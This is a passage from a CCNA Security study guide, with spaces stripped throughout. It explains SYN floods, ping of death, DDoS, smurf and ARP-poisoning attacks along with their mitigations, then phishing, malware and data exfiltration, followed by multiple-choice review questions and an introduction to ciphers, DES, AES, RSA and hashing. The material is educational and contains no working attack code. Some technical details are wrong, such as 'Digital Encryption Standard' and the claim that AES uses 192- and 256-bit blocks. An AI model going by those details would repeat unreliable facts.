TCPSYNFloodTounderstandaTCPSYNfloodattack,youmustunderstandthethree-wayTCPhandshake,whichoccurswheneveraTCPconnectionismade.Figure2.5displaystheprocess.
FIGURE2.5TCPhandshake
OneimportantfactnotevidentinthefigureisthatwhentherecipientoftheinitialSYNpacket
receivesthatpacketandrespondsbysendingaSYN/ACKpacket,itwillreserveasmallpieceofmemoryfortheexpectedresponse(ACK).IntheattacktheattackersendsthousandsoftheseSYNpacketsandneveranswerstheSYN/ACKpacketswithanACKpacket.Atsomepoint,therecipientwillfillupitsmemory,reservingspacefortheresponsesthatnevercome.Thenthetargetwillbeunabletodoanythingandisthusthedenialofservice.Figure2.6showstheattack.AtthepointinthediagramwhereitsaysTCPQueueFull,thetargetmemoryisfull.
FIGURE2.6SYNflood
PingofDeathApingofdeathiswhenanoversizedICMPpacketissenttothetarget.ThemaximumallowableIPpacketsizeis65,535bytes,includingthepacketheader,whichistypically20bytes.AnICMPechorequestisanIPpacketwithapseudoheader,whichis8bytes.Therefore,themaximumallowablesizeofthedataareaofanICMPechorequestis65,507bytes(65,535–20–8=65,507).
AgrosslyoversizedICMPpacketcantriggerarangeofadversesystemreactionssuchasDoS,crashing,freezing,andrebooting.Figure2.7showssuchapacket.Thepacketwillbefragmentedenroute,andwhenthetargetattemptstoreassemblethepacket,itwillcrashsomesystems.
FIGURE2.7Ping-of-deathpacket
DDoSAdistributedDoS(DDoS)attackisaDoSattackthatiscarriedoutfrommultipleattacklocations.Vulnerabledevicesareinfectedwithsoftwareagents,calledzombies.Thisturnsthevulnerabledevicesintobotnets,whichthencarryouttheattack.
Becauseofthedistributednatureoftheattack,identifyingalltheattackingbotnetsisvirtuallyimpossible.Thebotnetsalsohelptohidetheoriginalsourceoftheattack.Theseattackscanbedirect,reflected,andamplified.Let’slookatexamplesofeach.
DirectDDoSInadirectDDoSattack,theattackerlaunchestheattackbysendingtheattacksignaltothehandlers,whichinturnsignalthezombiestoattack,asshowninFigure2.8.Theattackisgreatlyamplifiedbytheuseofthezombies.So,adirectattackisalsoanamplifiedattack.
FIGURE2.8DirectDDoS
ReflectionInareflectedDDoSattack,theattackisbouncedoffalargenumberofdeviceswithoutactuallyrecruitingthedevicesaszombies.AgoodexampleofthereflectiontypeofDDoSisthesmurf
attack.Inthesmurfattack,theattackersendsanICMPpackettothebroadcastaddressofthenetworkinwhichthetargetresides.However,thehackercreatesthisICMPpacketwithaspoofedsourceaddressandthatspoofedaddressisthatofthetarget.Wheneverydeviceinthenetworkanswersthepingrequests,theanswerswillgotothetarget.Typically,thehackerwillsetthenumberofpingstoaveryhighnumbersothatthiscontinuesforsometimeandusesalltheresourcesofthewebserver,asshowninFigure2.9.
FIGURE2.9Smurfattack
Man-in-the-MiddleAttackAman-in-the-middle(MITM)attackiswhenanactiveattackerlistenstothecommunicationbetweentwocommunicatorsandchangesthecontentsofthiscommunication.Whileperformingthisattack,theattackerpretendstobeoneofthepartiestotheotherparty.ThemostcommontypeofMITMattackisdoneatlayer2andusesthetechniquedescribedinthenextattacktopollutetheARPcacheofthetargets.
ARPPoisoningOneofthewaysaman-in-themiddleattackisaccomplishedisbypoisoningtheARPcacheonaswitch.TheattackeraccomplishesthisARPpoisoningbyansweringARPrequestsforanothercomputer’sIPaddresswiththeirownMACaddress.OncetheARPcachehasbeensuccessfullypoisoned,whenARPresolutionoccurs,bothcomputerswillhavetheattacker’sMACaddresslistedastheMACaddressthatmapstotheothercomputer’sIPaddress.Asaresult,botharesendingtotheattacker,placingtheattacker“inthemiddle.”
TwomitigationtechniquesareavailableforpreventingARPpoisoningonaCiscoswitch.
DynamicARPInspection(DAI)ThissecurityfeatureinterceptsallARPrequestsand
responsesandcompareseachresponse’sMACaddressandIPaddressinformationagainsttheMAC–IPbindingscontainedinatrustedbindingtable.ThistableisbuiltbyalsomonitoringallDHCPrequestsforIPaddressesandmaintainingthemappingofeachresultingIPaddresstoaMACaddress(whichispartofDHCPsnooping).Ifanincorrectmappingisattempted,theswitchrejectsthepacket.
DHCPSnoopingThemainpurposeofDHCPsnoopingistopreventapoisoningattackontheDHCPdatabase.Thisisnotaswitchattackperse,butoneofitsfeaturescansupportDAI.ItcreatesamappingofIPaddressestoMACaddressesfromatrustedDHCPserverthatcanbeusedinthevalidationprocessofDAI.
YoumustimplementbothDAIandDHCPsnoopingbecauseDAIdependsonDHCPsnooping.BothconfigurationswillbecoveredinChapter6.
SocialEngineeringSocialengineeringattacksoccurwhenattackersusebelievablelanguageandusergullibilitytoobtainusercredentialsorsomeotherconfidentialinformation.Inthissectionwearegoingtofocusourattentiononasocialengineeringattackthathasbeeninthenewsquiteabitlately:phishing.
Phishing/PharmingPhishingisasocialengineeringattackinwhichattackerstrytolearnpersonalinformation,includingcreditcardinformationandfinancialdata.Thistypeofattackisusuallycarriedoutbyimplementingafakewebsitethatverycloselyresemblesalegitimatewebsite.Usersenterdata,includingcredentialsonthefakewebsite,allowingtheattackerstocaptureanyinformationentered.Spearphishingisaphishingattackcarriedoutagainstaspecifictargetbylearningaboutthetarget’shabitsandlikes.Spearphishingattackstakelongertocarryoutthanphishingattacksbecauseoftheinformationthatmustbegathered.
Pharmingissimilartophishing,butpharmingactuallypollutesthecontentsofacomputer’sDNScachesothatrequeststoalegitimatesiteareactuallyroutedtoanalternatesite.
PreventionThebestcountermeasureagainstsocialengineeringthreatsistoprovideusersecurityawarenesstraining.Thistrainingshouldberequiredandmustoccuronaregularbasisbecausesocialengineeringtechniquesevolveconstantly.
Cautionusersagainstusinganylinksembeddedine-mailmessages,evenifthemessageappearstohavecomefromalegitimateentity.UsersshouldalsoreviewtheaddressbaranytimetheyaccessasitewheretheirpersonalinformationisrequiredtoensurethatthesiteiscorrectandthatSSLisbeingused,whichisindicatedbyanHTTPSdesignationatthebeginningoftheURLaddress.
MalwareMalicioussoftware,alsocalledmalware,isanysoftwarethatisdesignedtoperformmaliciousacts.Thefollowingarethefourclassesofmalwareyoushouldunderstand:
VirusAnymalwarethatattachesitselftoanotherapplicationtoreplicateordistributeitself
WormAnymalwarethatreplicatesitself,meaningthatitdoesnotneedanotherapplicationorhumaninteractiontopropagate
TrojanHorseAnymalwarethatdisguisesitselfasaneededapplicationwhilecarryingoutmaliciousactions
SpywareAnymalwarethatcollectsprivateuserdata,includingbrowsinghistoryorkeyboardinput
Thebestdefenseagainstmalicioussoftwareistoimplementantivirusandanti-malwaresoftware.Todaymostvendorspackagethesetwotypesofsoftwareinthesamepackage.Keepingantivirusandanti-malwaresoftwareup-to-dateisvital.Thisincludesensuringthatthelatestvirusandmalwaredefinitionsareinstalled.
DataLossandExfiltrationDataexfiltrationistheunauthorizedtransferofdatafromacomputerorfromastoragedevice.Atitsmostseriouslevel,itistheultimategoalofadvancedpersistentthreats(APTs),whicharethosethatcontinueonalong-termbasisandarecarriedoutbyhighlyskilledcybercriminals.Thesegroupsarenotinterestedinthevacationphotosofthereceptionist.Theyareinterestedinthreetypesofdatathattheycanmonetize.Let’slookatthesedatatypes.
IPIntellectualpropertyispropertythatisconsideredtobeauniquecreationofthemindandincludesbooks,music,logos,inventions,andslogans.Theseitemscanbeprotectedbycopyrights,patents,trademarks,andregistrations.However,italsoincludesthingsthatcannotbeprotectedwiththesemechanismssuchasorganizationalplans,formulas,recipes,customerlists,andothertypesofdatathatcannotbedisclosedbecauseitmighteliminateorreducetheeffectivenessofabusinessadvantage.AttackvectorsforIPincludedisgruntledemployees,competitorsperformingcorporateespionage,andinadvertentreleasesthoughsocialmedia.
PIIPersonallyidentifiableinformation(PII)isanypieceofdatathatcanbeusedaloneorwithotherinformationtoidentifyasingleperson.AnyPIIthatanorganizationcollectsmustbeprotectedinthestrongestmannerpossible.PIIincludesfullname,identificationnumbers(includingdriver’slicensenumberandSocialSecuritynumber),dateofbirth,placeofbirth,biometricdata,financialaccountnumbers(bothbankaccountandcreditcardnumbers),anddigitalidentities(includingsocialmedianamesandtags).
KeepinmindthatdifferentcountriesandlevelsofgovernmentcanhavedifferentqualifiersforidentifyingPII.Securityprofessionalsmustensurethattheyunderstandinternational,national,state,andlocalregulationsandlawsregardingPII.Asthetheftofthisdatabecomesevenmoreprevalent,youcanexpectmorelawstobeenactedthatwillaffectyourjob.
CreditCardWhilePIIcanbeusedtoperformidentitytheft,stealingcreditcardinformationprovidesamuchquickerpathtomonetizingmaliciousactivities.Manyofthemosthigh-profiledatabreacheshaveinvolvedtheharvestingofthousandsofcreditcardnumbersandtherelatedinformationthatmakesthemusable.Whenanorganizationsuffersthistypeofdisclosure,ithurtstheirreputationbecausetheymustinformeveryuserwhosedatawasdisclosed.Theywillalsoberesponsibleforanyharmsufferedbythedisclosure,sothisisarealnightmarewhenitoccurs.ThebestmitigationforthisistoadoptallrecommendationsofthePaymentCardIndustryDataSecurityStandard(PCI-DSS).
SummaryThischaptercoveredcommonnetworkattacksandtheirmotivations.Italsodiscussedvariousattackvectors,suchasmaliciousandnonmaliciousinsidersandoutsiders,terrorists,spies,andterminatedpersonnel.Thechapteralsolookedatvariousmethodsusedtoperformnetworkreconnaissance,suchaspingscansandportscans.Finally,thechaptercoveredtypesofmalwareandtheexfiltrationofsensitivedatasuchasIP,PII,andcreditcarddata.
ExamEssentialsDescribeattackmotivations.Theseincludefinancialgain,disruption,geopoliticalchange,andnotoriety.Theymaybeattemptedbyorganizedcrimegroups,statesponsors,terroristgroups,hacktivists,andthrillhackers.
Identifycommonnetworkattacks.TheseincludebutarenotlimitedtoIPaddressspoofing,MACaddressspoofing,andemailspoofing.Theyalsoincludepasswordattackssuchasdictionaryandbrute-forceattacks.Finally,explainreconnaissanceattackssuchaspingscans,portscans,andSYNscans.
Explainsocialengineeringattacks.Describephishingandpharmingattacksandhowtheseattackscanleadtomalwaresuchasviruses,worms,andTrojanhorses.
Definethetypesofinformationmostsusceptibletodataexfiltration.Theseincludepersonallyidentifiableinformation(PII),intellectualproperty,andcreditcardinformation.Provideexamplesforeachtypeofdata.
ReviewQuestions
1. Whatisthetypicalmotivationofahacktivist?
A. Financialgain
B. Disruption
C. Geopoliticalchange
D. Notoriety
2. WhichofthefollowingattackshasasitsgoaltogetthroughanACLonarouter?
A. IPaddressspoofing
B. MACaddressspoofing
C. Emailspoofing
D. Bufferoverflow
3. Whichofthefollowingisnotaformofpasswordattack?
A. Bruteforce
B. Dictionary
C. Portscan
D. Socialengineering
4. WhenexecutingaNULLscan,whichresponseindicatestheportisclosedonthetarget?
A. Noresponse
B. Destinationunreachable
C. RST
D. ACK
5. Whichofthefollowingisameasureusedtopreventbufferoverflows?
A. Inputvalidation
B. Multifactorauthentication
C. Complexpasswords
D. Sensitivitylabels
6. WhichofthefollowingisnotaDDoSattack?
A. SYNflood
B. Pingofdeath
C. Smurfattack
D. Man-in-the-middle
7. Whichofthefollowingistypicallyusedtosetupaman-in-the-middleattack?
A. ARPpoisoning
B. DynamicARPinspection
C. Rogueswitches
D. MACoverflow
8. WhichofthefollowingismitigationforARPpoisoning?
A. Inputvalidation
B. DAI
C. Multifactorauthentication
D. Rootguard
9. WhichofthefollowingmustbeimplementedtouseDAI?
A. DTP
B. AuthenticatedARP
C. DHCPsnooping
D. NAT
10. Whichofthefollowingattachesitselftoanotherapplicationtoreplicateordistributeitself?
A. Worm
B. Rootkit
C. Spyware
D. Virus
11. Whichofthefollowingisconsideredtobeauniquecreationofthemind?
A. PII
B. IP
C. PHI
D. IPS
12. Whichofthefollowingprovidesrecommendationsforsecurelyhandlingcreditcarddata?
A. HIPAA
B. SOX
C. PCI-DSS
D. GLBA
13. AtwhatOSIlayerdoesMACaddressspoofingoccur?
A. 1
B. 2
C. 3
D. 4
14. Whichofthefollowingismitigationforemailspoofing?
A. SPF
B. DAI
C. DNSSec
D. DHCPsnooping
15. Whichofthefollowingisacommontoolusedforpingandportscans?
A. Metasploit
B. Nmap
C. Netstat
D. Snort
16. WhichofthefollowingisnotaflagsetinanXMASscan?
A. FIN
B. PSH
C. SYN
D. URG
17. WhichofthefollowingattacksusesanoversizedICMPpacket?
A. Pingofdeath
B. Smurf
C. Fraggle
D. SYNflood
18. WhichofthefollowingisareflectedDDoSattack?
A. Pingofdeath
B. Smurf
C. Bufferoverflow
D. XXS
19. WhichattacktypedoesDAIaddress?
A. IPspoofing
B. MACoverflow
C. ARPpoisoning
D. Pingofdeath
20. Whichofthefollowingpollutesthecontentsofacomputer’sDNScachesothatrequeststoalegitimatesiteareactuallyroutedtoanalternatesite?
A. Phishing
B. Pharming
C. Vishing
D. Whaling
Chapter3UnderstandingCryptographyCISCOCCNASECURITYEXAMOBJECTIVESCOVEREDINTHISCHAPTER:
1.3Cryptographyconcepts
Describekeyexchange
Describehashalgorithm
Compareandcontrastsymmetricandasymmetricencryption
Describedigitalsignatures,certificates,andPKI
Cryptographyistheuseofmathematicalalgorithmstoscrambledatasoitcannotbereadifcaptured.Inthatrolecryptographyprovidesconfidentiality,butthatisnottheonlysecuritygoalitcanachieve.Throughtheuseofhashvaluesanddigitalsignatures,itcanalsoprovideassuranceofdataintegrityandoriginauthentication.Thischapterwillcoverthetypesofcryptography,theirstrengthsandweaknesses,andsomeoftheservicesthatcryptographycanprovide.
Inthischapter,youwilllearnthefollowing:
Cryptographyconcepts
SymmetricandAsymmetricEncryptionTherearetwotypesofcryptographyalgorithmsthatyoumustunderstand,symmetricandasymmetric.Abitlaterinthissectionyouwilllearnthedifferencesbetweenthesetwosystemsandtheadvantagesanddisadvantagesofboth.You’llalsolearnwhentoapplythesealgorithmstosecurebothdataatrestanddataintransit.
Butfirstlet’slookatsomebasicconceptsusedincryptography.Firstyou’llbeintroducedtosomeofthevariouswaysalgorithmsscramblethedata.Thenyou’lllearnabouttwodifferentwaysencryptionalgorithmsoperateonthedata.
CiphersCryptographicalgorithmsareoftencalledciphersforshort,andtheseciphersare
mathematicalformulasthatmovethedataaroundinvariouswaystoscrambleit.Thetwomainmethodsaresubstitutionandtransposition.I’llcovertheseinthissection,alongwithamethodofaddressingshortcomingsofsubstitution.Ciphersalsodifferintheamountofdatathatisencryptedatatime.Thetwomaintypesofalgorithmswithrespecttothisissueareblockandstreamciphers,whichwillalsobecoveredinthissection.
SubstitutionAsubstitutioncipherusesakeytosubstitutecharactersorcharacterblockswithdifferentcharactersorcharacterblocks.TheCaesarcipherandtheVigenèrecipheraretwooftheearliestformsofsubstitutionciphers.Figure3.1showstheROT13,whichisaCaesarcipher.Itrotatesthealphabet13positions.Therefore,themessage“Hello”encryptstotheciphertextURYYB.
FIGURE3.1ROT13Caesarcipher
Oneoftheissueswithsubstitutionciphersisifthemessageisofsufficientlength,patternsintheencryptionbegintobecomenoticeable,whichmakesitvulnerabletoafrequencyattack.Afrequencyattackiswhentheattackerusestheserecurringpatternstoreverseengineerthemessage.Forthisreason,thepolyalphabeticalgorithmwascreated.
PolyalphabeticToincreasethedifficultyofperformingafrequencyattack,polyalphabeticalgorithmswerecreated.Theyusemultipleinstancesofthealphabetshiftedina26×26tablecalledatableau,showninFigure3.2.ThefigureshowstheVigenèrecipher,anexampleofapolyalphabeticcipher.
FIGURE3.2Vigenèrecipher
AsanexampleofamessageonwhichtheVigenèrecipherisapplied,let’susethesecuritykeySYBEXandtheplaintextmessageofWEATTACKATFIVE.ThefirstletterintheplaintextmessageisW,andthefirstletterinthekeyisS.WeshouldlocatetheletterWacrosstheheadingsforthecolumns.WefollowthatcolumndownuntilitintersectswiththerowthatstartswiththeletterS,resultingintheletterO.ThesecondletteroftheplaintextmessageisE,andthesecondletterinthekeyisY.Usingthesamemethod,weobtaintheletterC.Wecontinueinthissamemanneruntilwerunoutofkeyletters,andthenwestartoverwiththekey,whichwouldresultinthesecondAintheplaintextmessageworkingwiththeletterSofthekey.
So,applyingthistechniquetotheentiremessageofWEATTACKATFIVE,theplaintextmessageconvertstotheOCBXQSALEQXGWIciphertextmessage.
TranspositionAtranspositioncipherscramblesthelettersoftheoriginalmessageinadifferentorder.Thekeydeterminesthepositionstowhichthelettersaremoved.
Thefollowingisanexampleofasimpletranspositioncipher:
OriginalmessageSNOWFLAKESWILLFALL
BrokenintogroupsSNOWFLAKESWIFALL
Key4231231442312314
CiphertextmessageWONSLAFKIWSEALFL
Withthisexample,theoriginalmessageisSNOWFLAKESWILLFALL,andthekeyis42312314.TheciphertextmessageisWONSLAFKIWSEALFL.So,youtakethefirstfourletters
oftheplaintextmessage(SNOW)andusethefirstfournumbers(4231)asthekeyfortransposition.Thekeydescribestherelativepotionsofthesamecharactersintheciphertext.Inthenewciphertext,theletterswouldbeWONS.Thenyoutakethenextfourlettersoftheplaintextmessage(FLAK)andusethenextfournumbers(2314)asthekeyfortransposition.Inthenewciphertext,theletterswouldbeLAFK.Thenyoutakethenextfourlettersoftheoriginalmessageandapplythefirstfournumbersofthekeybecauseyoudonothaveanymorenumbersinthekey.Continuethispatternuntilcomplete.
AlgorithmsWhilecryptographicalgorithmscandeployeithersubstitutionortransposition,thereisanotherkeycharacteristicthatdifferentiatestwomainclassesofalgorithms:symmetricandasymmetric.Inthenexttwosections,I’lltalkabouthowtheyaredifferent.
SymmetricSymmetricalgorithmsuseaprivateorsecretkeythatmustremainsecretbetweenthetwoparties.Eachpartypairrequiresaseparateprivatekey.Therefore,asingleuserwouldneedauniquesecretkeyforeveryuserwithwhomshecommunicates.
Consideranexamplewherethereare10uniqueusers.Eachuserneedsaseparateprivatekeytocommunicatewiththeotherusers.Tocalculatethenumberofkeysthatwouldbeneededinthisexample,youwouldusethefollowingformula:
#ofusers×(#ofusers–1)/2
Usingourexample,youwouldcalculate10×(10–1)/2,or45neededkeys.
Withsymmetricalgorithms,theencryptionkeymustremainsecure.Toobtainthesecretkey,theusersmustfindasecureout-of-bandmethodforcommunicatingthesecretkey,includingcourierordirectphysicalcontactbetweentheusers.
Aspecialtypeofsymmetrickeycalledasessionkeyencryptsmessagesbetweentwousersduringonecommunicationsession.Symmetricalgorithmscanbereferredtoassingle-key,secret-key,private-key,orshared-keycryptography.
Symmetricsystemsprovideconfidentialitybutnotauthenticationornonrepudiation.Ifbothusersusethesamekey,determiningwherethemessageoriginatedisimpossible.SymmetricalgorithmsincludeDES,AES,3DES,andRC4.Table3.1liststhestrengthsandweaknessesofsymmetricalgorithms.
TABLE3.1Symmetricalgorithmstrengthsandweaknesses
Strengths WeaknessesCheapertoimplementthanasymmetric
Keycompromisecanoccurmoreeasilythanwithasymmetric
Fasterthanasymmetric DifficultyinperformingsecurekeydistributionHardtocrack Keycompromiseoccursifonepartycompromised,thereby
allowingimpersonation
Thetwobroadtypesofsymmetricalgorithmsarestream-basedciphersandblockciphers.Initializationvectors(IVs)areanimportantpartofblockciphers.Thesethreecomponentswillbediscussedinthenextsections.
BlockAnotherwayinwhichcipherscandifferisintheamountofdatathatisencryptedatatime.Blockciphersperformencryptionbybreakingthemessageintofixed-lengthunits.Amessageof1,024bitscouldbedividedinto16blocksof64bitseach.Eachofthose16blocksisprocessedbythealgorithmformulas,resultinginasingleblockofciphertext.
Advantagesofblockciphersincludethefollowing:
Theimplementationiseasierthanstream-basedcipherimplementation.
Theyaregenerallylesssusceptibletosecurityissues.
Theyaregenerallyusedmoreinsoftwareimplementations.
Blockciphersemploybothsubstitutionandtransposition.
StreamStream-basedciphersperformencryptiononabit-by-bitbasisandusekeystreamgenerators.ThekeystreamgeneratorscreateabitstreamthatisXORedwiththeplaintextbits.TheresultofthisXORoperationistheciphertext.
Asynchronousstream-basedcipherdependsonlyonthekey,andanasynchronousstreamcipherdependsonthekeyandplaintext.ThekeyensuresthatthebitstreamthatisXORedtotheplaintextisrandom.
Anexampleofastream-basedcipherisRC4.
Advantagesofstream-basedciphersincludethefollowing:
Theygenerallyhavelowererrorpropagationbecauseencryptionoccursoneachbit.
Theyaregenerallyusedmoreinhardwareimplementation.
Theyusethesamekeyforencryptionanddecryption.
Theyaregenerallycheapertoimplementthanblockciphers.
Theemployonlysubstitution.
InitializationVectorsSomemodesofsymmetrickeyalgorithmsuseinitializationvectorstoensurethatpatternsarenotproducedduringencryption.TheseIVsprovidethisservicebyusingrandomvalueswiththealgorithms.WithoutusingIVs,arepeatedphrasewithinaplaintextmessagecouldresultinthesameciphertext.Attackerscanpossiblyusethesepatternstobreaktheencryption.
DigitalEncryptionStandard(DES)DigitalEncryptionStandard(DES)usesa64-bitkey,8bitsofwhichareusedforparity.Therefore,theeffectivekeylengthforDESis56bits.DESdividesthemessageinto64-bitblocks.Sixteenroundsoftranspositionandsubstitutionareperformedoneachblock,resultingina64-bitblockofciphertext.
DEShasmostlybeenreplacedby3DESandAES,bothofwhicharediscussedlaterinthischapter.
3DESBecauseoftheneedtoquicklyreplaceDES,TripleDES(3DES),aversionofDESthatincreasessecuritybyusingthree56-bitkeys,wasdeveloped.Although3DESisresistanttoattacks,itisuptothreetimesslowerthanDES.3DESdidserveasatemporaryreplacementtoDES.However,theNationalInstituteofStandardsandTechnology(NIST)hasactuallydesignatedtheAdvancedEncryptionStandard(AES)asthereplacementforDES,eventhough3DESisstillinusetoday.
DEScanoperateinanumberofdifferentmodes,butthetwomostcommonareElectronicCodeBook(ECB)andCipherBlockChaining(CBC).InECB,64-bitblocksofdataareprocessedbythealgorithmusingthekey.Theciphertextproducedcanbepaddedtoensurethattheresultisa64-bitblock.Ifanencryptionerroroccurs,onlyoneblockofthemessageisaffected.ECBoperationsruninparallel,makingitafastmethod.
AlthoughECBistheeasiestandfastestmodetouse,ithassecurityissuesbecauseevery64-bitblockisencryptedwiththesamekey.Ifanattackerdiscoversthekey,alltheblocksofdatacanberead.Ifanattackerdiscoversbothversionsofthe64-bitblock(plaintextandciphertext),thekeycanbedetermined.Forthesereasons,themodeshouldnotbeusedwhenencryptingalargeamountofdatabecausepatternswouldemerge.ECBisagoodchoiceifanorganizationneedsencryptionforitsdatabasesbecauseECBworkswellwiththeencryptionofshortmessages.
Figure3.3showstheECBencryptionprocess.
FIGURE3.3ECBprocess
InCBC,each64-bitblockischainedtogetherbecauseeachresultant64-bitciphertextblockisappliedtothenextblock.So,plaintextmessageblock1isprocessedbythealgorithmusinganIV.Theresultantciphertextmessageblock1isXORedwithplaintextmessageblock2,resultinginciphertextmessage2.Thisprocesscontinuesuntilthemessageiscomplete.
UnlikeECB,CBCencryptslargefileswithouthavinganypatternswithintheresultingciphertext.IfauniqueIVisusedwitheachmessageencryption,theresultantciphertextwillbedifferenteverytimeevenincaseswherethesameplaintextmessageisused.
Figure3.4showstheCBCencryptionprocess.
FIGURE3.4CBCprocess
AdvancedEncryptionStandard(AES)AdvancedEncryptionStandard(AES)isthereplacementalgorithmforDES.AlthoughAESisconsideredthestandard,thealgorithmthatisusedintheAESstandardistheRijndaelalgorithm.TheAESandRijndaeltermsareoftenusedinterchangeably.
ThethreeblocksizesthatareusedintheRijndaelalgorithmare128,192,and256bits.A128-bitkeywitha128-bitblocksizeundergoes10transformationrounds.A192-bitkeywitha192-bitblocksizeundergoes12transformationrounds.Finally,a256-bitkeywitha256-bitblocksizeundergoes14transformationrounds.
Rijndaelemploystransformationscomposedofthreelayers:nonlinearlayer,keyadditionlayer,andlinear-maxinglayer.TheRijndaeldesignisverysimple,anditscodeiscompact,whichallowsittobeusedonavarietyofplatforms.ItistherequiredalgorithmforsensitivebutunclassifiedU.S.governmentdata.
RC4AtotalofsixRCalgorithmshavebeendevelopedbyRonRivest.RC1wasneverpublished,RC2wasa64-bitblockcipher,andRC3wasbrokenbeforerelease.RC4,alsocalledARC4,isoneofthemostpopularstreamciphers.ItisusedinSSLandWEP.RC4usesavariablekeysizeof40to2,048bitsandupto256roundsoftransformation.
AsymmetricAsymmetricalgorithmsusebothapublickeyandaprivateorsecretkey.Thepublickeyisknownbyallparties,andtheprivatekeyisknownonlybyitsowner.Oneofthesekeysencryptsthemessage,andtheotherdecryptsthemessage.
Inasymmetriccryptography,determiningauser’sprivatekeyisvirtuallyimpossibleevenifthepublickeyisknown,althoughbothkeysaremathematicallyrelated.However,ifauser’sprivatekeyisdiscovered,thesystemcanbecompromised.
Asymmetricalgorithmscanbereferredtoasdual-keyorpublic-keycryptography.
Asymmetricsystemsprovideconfidentiality,integrity,authentication,andnonrepudiation.Becausebothusershaveoneuniquekeythatispartoftheprocess,determiningwherethemessageoriginatedispossible.
Ifconfidentialityistheprimaryconcernforanorganization,amessageshouldbeencryptedwiththereceiver’spublickey,whichisreferredtoasasecuremessageformat.Ifauthenticationistheprimaryconcernforanorganization,amessageshouldbeencryptedwiththesender’sprivatekey,whichisreferredtoasanopenmessageformat.Whenusingopenmessageformat,themessagecanbedecryptedbyanyonewiththepublickey.
PerhapsthemostwidelyknownandusedasymmetricalgorithmisRSA.OherasymmetricalgorithmsincludeRSA,ElGamal,DSA,andEllipticCurveCryptography(ECC).
RSARSAisthemostpopularasymmetricalgorithmandwasinventedbyRonRivest,AdiShamir,andLeonardAdleman.RSAcanprovidekeyexchange,encryption,anddigitalsignatures.ThestrengthoftheRSAalgorithmisthedifficultyoffindingtheprimefactorsofverylargenumbers.RSAusesa1,024-to4,096-bitkeyandperformsoneroundoftransformation.
Asakeyexchangeprotocol,RSAencryptsaDESorAESsymmetrickeyforsecuredistribution.RSAusesaone-wayfunctiontoprovideencryption/decryptionanddigitalsignatureverification/generation.Thepublickeyworkswiththeone-wayfunctiontoperformencryptionanddigitalsignatureverification.Theprivatekeyworkswiththeone-wayfunctiontoperformdecryptionandsignaturegeneration.Theseprocesseswillbecoveredindetailinthesection“PublicKeyInfrastructure(PKI).”
HashingAlgorithms
Ahashfunctionrunsdatathroughacryptographicalgorithmtoproduceaone-waymessagedigest.Thesizeofthemessagedigestisdeterminedbythealgorithmused.Themessagedigestrepresentsthedatabutcannotbereversedinordertodeterminetheoriginaldata.Becausethemessagedigestisunique,itcanbeusedtocheckdataintegrity.
Aone-wayhashfunctionreducesamessagetoahashvalue.Acomparisonofthesender’shashvaluetothereceiver’shashvaluedeterminesmessageintegrity.Iftheresultanthashvaluesaredifferent,thenthemessagehasbeenalteredinsomeway,providedthatboththesenderandthereceiverusedthesamehashfunction.Hashfunctionsdonotpreventdataalterationbutprovideameanstodeterminewhetherdataalterationhasoccurred.
Hashfunctionsdohavelimitations.Ifanattackerinterceptsamessagethatcontainsahashvalue,theattackercanaltertheoriginalmessagetocreateasecondinvalidmessagewithanewhashvalue.Iftheattackerthensendsthesecondinvalidmessagetotheintendedrecipient,theintendedrecipientwillhavenowayofknowingthathereceivedanincorrectmessage.Whenthereceiverperformsahashvaluecalculation,theinvalidmessagewilllookvalidbecausetheinvalidmessagewasappendedwiththeattacker’snewhashvalue,nottheoriginalmessage’shashvalue.Topreventthisfromoccurring,thesendershoulduseMessageAuthenticationCode(MAC).
EncryptingthehashfunctionwithasymmetrickeyalgorithmgeneratesakeyedMAC.Thesymmetrickeydoesnotencrypttheoriginalmessage.Itisusedonlytoprotectthehashvalue.Figure3.5showsthebasicstepsofahashfunction.
FIGURE3.5Hashprocess
Twomajorhashfunctionvulnerabilitiescanoccur:collisionsandrainbowtableattacks.Acollisionoccurswhenahashfunctionproducesthesamehashvalueondifferentmessages.Arainbowtableattackoccurswhenrainbowtablesareusedtoreverseahashbycomputingallpossiblehashesandlookingupthematchingvalue.
Becauseamessagedigestisdeterminedbytheoriginaldata,messagedigestscanbeusedtocomparedifferentfilestoseewhethertheyareidenticaldowntothebitlevel.Ifacomputedmessagedigestdoesnotmatchtheoriginalmessagedigestvalue,thendataintegrityhasbeencompromised.
Passwordhashvaluesareoftenstoredinsteadoftheactualpasswordstoensurethattheactualpasswordsarenotcompromised.
Whenchoosingwhichhashingfunctiontouse,itisalwaysbettertochoosethefunctionthatusesalargerhashvalue.Todeterminethehashvalueforafile,youshouldusethehashfunction.Asanexample,let’ssupposeyouhaveadocumentnamedcrypto.docthatyouneedtoensureisnotmodifiedinanyway.Todeterminethehashvalueforthefileusingthemd5hashfunction,youwouldenterthefollowingcommand:
md5crypto.doc
Thiscommandwouldresultinahashvaluethatyoushouldrecord.Later,whenusersneedaccesstothefile,theyshouldalwaysissuethemd5commandlistedtorecalculatethehashvalue.Ifthevalueisthesameastheoriginallyrecordedvalue,thefileisunchanged.Ifitisdifferent,thenthefilehasbeenchanged.
MD5TheMD5algorithmproducesa128-bithashvalue.Itperformsfourroundsofcomputations.ItwasoriginallycreatedbecauseoftheissueswithMD4,anditismorecomplexthanMD4.However,MD5isnotcollisionfree.Forthisreason,itshouldnotbeusedforSSLcertificatesordigitalsignatures.TheU.S.governmentrequirestheusageofSHA-2insteadofMD5.However,incommercialusage,manysoftwarevendorspublishtheMD5hashvaluewhenreleasingsoftwarepatchessocustomerscanverifythesoftware’sintegrityafterdownload.
SHA-1SHA-1producesa160-bithashvalueafterperforming80roundsofcomputationson512-bitblocks.SHA-1correctedtheflawinSHA-0thatmadeitsusceptibletoattacks.
SHA-2SHA-2isactuallyafamilyofhashfunctions,eachofwhichprovidesdifferentfunctionallimits.TheSHA-2familyisasfollows:
SHA-224:Producesa224-bithashvalueafterperforming64roundsofcomputationson512-bitblocks.
SHA-256:Producesa256-bithashvalueafterperforming64roundsofcomputationson512-bitblocks.
SHA-384:Producesa384-bithashvalueafterperforming80roundsofcomputationson1,024-bitblocks.
SHA-512:Producesa512-bithashvalueafterperforming80roundsofcomputationson1,024-bitblocks.
SHA-512/224:Producesa224-bithashvalueafterperforming80roundsofcomputationson1,024-bitblocks.The512designationhereindicatestheinternalstatesize.
SHA-512/256:Producesa256-bithashvalueafterperforming80roundsofcomputationson1,024-bitblocks.Onceagain,the512designationindicatestheinternalstatesize.
